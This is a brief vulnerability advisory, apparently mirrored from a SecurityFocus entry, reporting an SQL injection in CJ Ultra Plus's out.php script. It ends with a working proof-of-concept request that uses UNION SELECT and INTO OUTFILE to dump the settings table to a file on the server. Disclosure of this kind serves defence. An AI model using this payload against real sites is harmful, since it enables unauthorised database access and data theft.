7 lines
No EOL
433 B
Text
7 lines
No EOL
433 B
Text
source: https://www.securityfocus.com/bid/13533/info
|
|
|
|
CJ Ultra Plus is prone to an SQL injection vulnerability.
|
|
|
|
This issue affects the 'out.php' script and could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.
|
|
|
|
/out.php?url=sad&perm=33333333333333333333333333332'%20UNION%20SELECT%20b12,b12%20FROM%20settings%20INTO%20OUTFILE%20'/path/to/ur/dir/x.txt/* |